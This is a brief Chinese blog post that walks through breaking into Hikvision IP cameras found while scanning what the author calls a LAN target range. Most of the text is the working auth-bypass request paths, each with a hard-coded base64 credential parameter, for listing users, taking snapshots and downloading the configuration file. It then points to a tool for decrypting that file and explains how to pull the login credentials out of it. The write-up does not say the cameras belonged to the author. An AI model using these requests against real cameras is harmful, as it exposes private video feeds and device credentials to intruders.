本文已参与「新人创作礼」活动,一起开启掘金创作之路。
0x00 前言
考试周太Boring了 本来局域网搭个靶场打打 然后扫到了几个摄像头,比较简单,就试试看
本文基本参考freebuf文章编写!!!
贴上参考师傅文章
0x01 开日
漏洞探测
探测用户列表
/Security/users?auth=YWRtaW46MTEK
读取快照
onvif-http/snapshot?auth=YWRtaW46MTEK
下载摄像头配置文件
/System/configurationFile?auth=YWRtaW46MTEK
配置文件的解密
hikvision的配置文件是加密的。解密工具网上很多要么收费的,要么不靠谱的,不能让资本家得逞哈
git上有好用的
github.com/WormChicken…
读取解密后的配置文件
需要用到wxmedit
下载地址:
wxmedit.github.io/zh_CN/downl…
根据你一开始读到的用户进行查找
done
记得登陆后用IE看!
再强调一下 本文参照freebuf上师傅的文章编写!!! 只是拿师傅的方法实操了一下
0x02 rethink
伪RT的快乐日常? 脚本小子罢了
